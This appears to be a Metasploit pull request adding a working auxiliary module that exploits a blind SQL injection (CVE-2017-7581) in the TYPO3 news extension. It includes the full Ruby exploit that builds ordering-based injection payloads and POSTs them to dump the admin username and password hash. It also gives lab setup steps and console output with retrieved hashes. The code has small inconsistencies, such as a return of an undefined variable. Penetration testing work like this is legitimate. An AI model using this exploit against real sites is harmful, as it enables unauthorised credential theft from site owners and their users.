### PR TITLE
Typo3 News Module Sql Injection exploit

### DIFF
--- a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md
+++ b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md
@@ -1,0 +1,49 @@
+## Description
+
+News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vulnerability. This module allows an unauthenticated user to exploit the SQL injection vulnerability by generating requests to retrieve the password hash for the admin user of the application. This module has been tested on TYPO3 3.16.0 running news extension 5.0.0.
+
+## Vulnerable Application
+
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+
+To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.
+
+## Options
+
+**PATTERN1** and **PATTERN2**
+
+These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.
+
+**ID**
+
+The value for query parameter `id` of the page that the news extension is running on.
+
+## Verification Steps
+
+- [ ] Install [Typo3 VM](https://www.turnkeylinux.org/download?file=turnkey-typo3-14.1-jessie-amd64.ova)
+- [ ] Launch the VM and configure it
+- [ ] SSH to the VM
+- [ ]  `cd /var/www/typo3/ && composer require georgringer/news:5.0.0`
+- [ ] Login to the web interface
+- [ ] Enable the news extension
+- [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
+- [ ] Enable page
+- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
+- [ ] Username and password hash should have been retrieved
+
+## Scenarios
+
+### News Module 5.0.0 on TYPO3 3.16.0
+
+```
+msfdev@simulator:~/git/metasploit-framework$ ./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost 172.22.222.136; set id 37; run'
+rhost => 172.22.222.136
+id => 37
+[*] Trying to automatically determine Pattern1 and Pattern2...
+[*] Pattern1: Article #1, Pattern2: Article #2
+[+] Username: admin
+[+] Password Hash: $P$Ch4lme3.gje9o.DjMip59baG7b/mIp.
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/typo3_news_module_sqli) > 
+```

--- a/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
+++ b/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
@@ -1,0 +1,141 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'TYPO3 News Module SQL Injection',
+      'Description'    => %q{
+         This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php
+         in the news module 5.3.2 and earlier, allows unauthenticated user to execute arbitrary
+         SQL commands via vectors involving overwriteDemand for order and OrderByAllowed.
+         This essentially means an attacker can obtain user credentials hashes.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Charles Fol', # initial discovery, POC
+          'Marco Rivoli <marco.rivoli.nvh<at>gmail.com>' #MSF code
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-7581'  ],
+          [ 'URL', 'http://www.ambionics.io/blog/typo3-news-module-sqli' ], # Advisory
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Apr 6 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of TYPO3', '/typo3/']),
+        OptString.new('ID', [true, 'The id of TYPO3 news page', '1']),
+        OptString.new('PATTERN1', [true, 'Pattern of the first article', 'Article #1']),
+        OptString.new('PATTERN2', [true, 'Pattern of the first article', 'Article #2'])
+      ])
+  end
+
+  def check
+    # the only way to test if the target is vuln
+    if test_injection
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def dump_the_hash
+    ascii_charset_lower = "a".upto("z").to_a.join('')
+    ascii_charset_upper = "A".upto("Z").to_a.join('')
+    ascii_charset = "#{ascii_charset_lower}#{ascii_charset_upper}"
+    digit_charset = "0".upto("9").to_a.join('')
+
+    full_charset = "#{ascii_charset_lower}#{ascii_charset_upper}#{digit_charset}$./"
+    username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset)
+    print_good("Username: #{username}")
+    password = blind('password','be_users', 'uid=1', full_charset, digit_charset)
+    print_good("Username: #{password}")
+    return [username, password]
+  end
+
+  def blind(field, table, condition, charset, digit_charset)
+    size = blind_size(
+     "length(#{field})+9",
+     table,
+     condition,
+     2,
+     digit_charset
+    )
+    size = size.to_i - 9
+    data = blind_size(
+     field,
+     table,
+     condition,
+     size,
+     charset
+    )
+    return data
+  end
+
+  def select_position(field, table, condition, position, char)
+    payload1 = "select(#{field})from(#{table})where(#{condition})"
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
+  end
+
+  def blind_size(field, table, condition, size, charset)
+    str = ""
+    for position in 0..size
+      for char in charset.split('')
+        payload = select_position(field, table, condition, position + 1, char)
+        #print_status(payload)
+        if test(payload)
+          str += char.to_s
+          #print_status(str)
+          break
+        end
+      end
+    end
+    return string
+  end
+
+  def test(payload)
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path,'index.php'),
+      'vars_get' => {
+        'id' => datastore['ID'],
+        'no_cache' => '1'
+       },
+       'vars_post' => {
+         'tx_news_pi1[overwriteDemand][OrderByAllowed]' => payload,
+         'tx_news_pi1[search][maximumDate]' => '2017-12-31',
+         'tx_news_pi1[overwriteDemand][order]' => payload,
+         'tx_news_pi1[search][subject]' => '',
+         'tx_news_pi1[search][minimumDate]' => '2017-01-01'
+       },
+    })
+    pattern1 = datastore['PATTERN1']
+    pattern2 = datastore['PATTERN2']
+    return res.body.index(pattern1) < res.body.index(pattern2)
+  end
+
+  def run
+    print_status("Dumping the username and password hash...")
+    dump_the_hash
+  end
+end

--- a/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
+++ b/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
@@ -71,6 +71,14 @@ class MetasploitModule < Msf::Auxiliary
     print_good("Username: #{username}")
     password = blind('password','be_users', 'uid=1', full_charset, digit_charset, patterns)
     print_good("Password Hash: #{password}")
+    connection_details = {
+            module_fullname: self.fullname,
+            username: username,
+            private_data: password,
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+        }.merge(service_details)
+    create_credential(connection_details)
   end
 
   def blind(field, table, condition, charset, digit_charset, patterns = {})

--- a/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
+++ b/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
     username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset)
     print_good("Username: #{username}")
     password = blind('password','be_users', 'uid=1', full_charset, digit_charset)
-    print_good("Username: #{password}")
+    print_good("Password Hash: #{password}")
     return [username, password]
   end
 

--- a/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
+++ b/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def blind_size(field, table, condition, size, charset,  patterns = {})
-    str = ""
+    str = ''
     for position in 0..size
       for char in charset.split('')
         payload = select_position(field, table, condition, position + 1, char)
@@ -142,11 +142,12 @@ class MetasploitModule < Msf::Auxiliary
     rescue Rex::ConnectionError, Errno::CONNRESET => e
       print_error("Failed: #{e.class} - #{e.message}")
     end
-    if res and res.code == 200
-      return res.body.index(patterns[:pattern1]) < res.body.index(patterns[:pattern2])
-    else
-      return false
+    if res && res.code == 200
+      unless res.body.index(patterns[:pattern1]).nil? || res.body.index(patterns[:pattern2]).nil?
+        return res.body.index(patterns[:pattern1]) < res.body.index(patterns[:pattern2])
+      end
     end
+    false
   end
 
   def try_autodetect_patterns
@@ -165,10 +166,10 @@ class MetasploitModule < Msf::Auxiliary
       return '', ''
     end
 
-    if res and res.code == 200
+    if res && res.code == 200
       news = res.get_html_document.search('div[@itemtype="http://schema.org/Article"]')
-      pattern1 = defined?(news[0]) ? news[0].search('span[@itemprop="headline"]').text : ''
-      pattern2 = defined?(news[1]) ? news[1].search('span[@itemprop="headline"]').text : ''
+      pattern1 = news[0].nil? ? '' : news[0].search('span[@itemprop="headline"]').text
+      pattern2 = news[1].nil? ? '' : news[1].search('span[@itemprop="headline"]').text
     end
 
     if pattern1.to_s.eql?('') || pattern2.to_s.eql?('')
@@ -183,7 +184,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     pattern1, pattern2 = try_autodetect_patterns
-    if pattern1 == '' or pattern2 == ''
+    if pattern1 == '' || pattern2 == ''
       print_error("Unable to determine pattern, aborting...")
     else
       dump_the_hash(:pattern1 => pattern1, :pattern2 => pattern2)

--- a/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
+++ b/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
@@ -127,6 +127,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def blind_size(field, table, condition, size, charset,  patterns = {})
+    vprint_status("Retrieving field '#{field}' string (#{size} bytes) ...")
     str = ""
     for position in 0..size
       for char in charset.split('')
@@ -178,16 +179,13 @@ class MetasploitModule < Msf::Auxiliary
     end
     pattern1 = defined?(news[0]) ? news[0].search('span[@itemprop="headline"]').text : ''
     pattern2 = defined?(news[1]) ? news[1].search('span[@itemprop="headline"]').text : ''
-    if pattern1 != '' and pattern2 != ''
-      print_status("Pattern1: #{pattern1}")
-      print_status("Pattern2: #{pattern2}")
-    else
-      print_status("Couldn't determine Pattern1 and Pattern2 automatically, switching to user speficied values...")
+    if pattern1.to_s.eql?('') || pattern2.to_s.eql?('')
+      print_status("Couldn't determine Pattern1 and Pattern2 automatically, switching to user specified values...")
       pattern1 = datastore['PATTERN1']
       pattern2 = datastore['PATTERN2']
-      print_status("Pattern1: #{pattern1}")
-      print_status("Pattern2: #{pattern2}")
     end
+    print_status("Pattern #1: #{pattern1}")
+    print_status("Pattern #2: #{pattern2}")
     return pattern1, pattern2
   end
 


### PR DESCRIPTION
Issue Number: resolves #8213 

This auxiliary module exploits a sqli vulnerability of Typo 3 news module
Link: https://www.ambionics.io/blog/typo3-news-module-sqli

## Vulnerable Environment Creation

Install the vulnerable software, it can be done rapidly as follows:

- [ ] `git clone https://github.com/Tuurlijk/TYPOTry`
- [ ] `Vagrant up`
- [ ] `Vagrant ssh`
- [ ] `cd /var/www/6.2.30.local.typo3.org`
- [ ] `composer require georgringer/news:3.2.6`
- [ ] Login to the web interface as admin:supersecret at http://6.2.30.local.typo3.org/typo3/
- [ ] Enable news plugin if not already enabled
- [ ] Import attached vulnerable page [T3D__2017-05-20_02-17-z.t3d.zip](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
- [ ] Enable page if not already enabled (name should be nlist)
- [ ] Check if page is visible to not authenticated user at http://6.2.30.local.typo3.org/index.php?id=40 (change the id according to your local instance)

## Verification

Example output
```bash
marco@kali:~/.msf4/modules/auxiliary/admin/http$ msfconsole -qx "use auxiliary/admin/http/typo3_news_module_sqli; set RHOST 192.168.144.120; set VHOST 6.2.30.local.typo3.org; set TARGETURI /; set ID 40; exploit; exit;"
RHOST => 192.168.144.120
VHOST => 6.2.30.local.typo3.org
TARGETURI => /
ID => 40
[*] Trying to automatically determine Pattern1 and Pattern2...
[*] Pattern1: Article #1
[*] Pattern2: Article #2
[*] Dumping the username and password hash...
[+] Username: admin
[+] Password Hash: $P$CjZzlLXeuoh/DZ2Agu83KljpKZUAYV1
[*] Auxiliary module execution completed
marco@kali:~/.msf4/modules/auxiliary/admin/http$ 
```